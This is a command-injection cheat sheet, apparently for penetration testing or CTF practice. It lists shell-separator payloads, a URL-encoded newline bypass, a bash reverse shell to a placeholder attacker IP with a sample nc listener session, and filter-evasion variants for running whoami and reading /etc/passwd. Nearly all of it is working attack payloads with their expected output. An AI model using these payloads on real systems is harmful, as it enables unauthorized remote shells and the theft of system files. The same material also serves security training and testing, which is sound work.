COMMAND INJECTION

Basic command injection

Try all separators in every input — Ping fields, search boxes, etc

127.0.0.1; whoami
127.0.0.1 | whoami
127.0.0.1 && whoami
127.0.0.1 || whoami
`whoami`
$(whoami)
Example Output
Input: 127.0.0.1; whoami

PING 127.0.0.1: 64 bytes from 127.0.0.1
www-data
(Command injection CONFIRMED)

Newline injection

URL encoded newline — Bypass some filters

127.0.0.1%0awhoami
Example Output
Input: 127.0.0.1%0awhoami

PING 127.0.0.1: 64 bytes...
www-data
(%0a = newline, starts new command)

Reverse shell from injection

Get a shell — URL encode special chars

127.0.0.1; bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/443 0>&1'
Example Output
Input: ;bash -c 'bash -i >& /dev/tcp/10.10.14.2/443 0>&1'

Attacker nc -nlvp 443:
connect to [10.10.14.2] from [10.10.10.5]
bash-4.4$ whoami
www-data

Bypass filters

Quote insertion, wildcards — When basic commands are blocked

w'h'oami
wh$@oami
/bin/w?oami
cat /et?/pas?wd
Example Output
whoami blocked? Try:
w'h'oami -> www-data
/bin/w?oami -> www-data
who$@ami -> www-data
cat /etc/passwd blocked? Try:
cat /et?/pas?wd -> works
tac /etc/passwd -> works (reverse cat)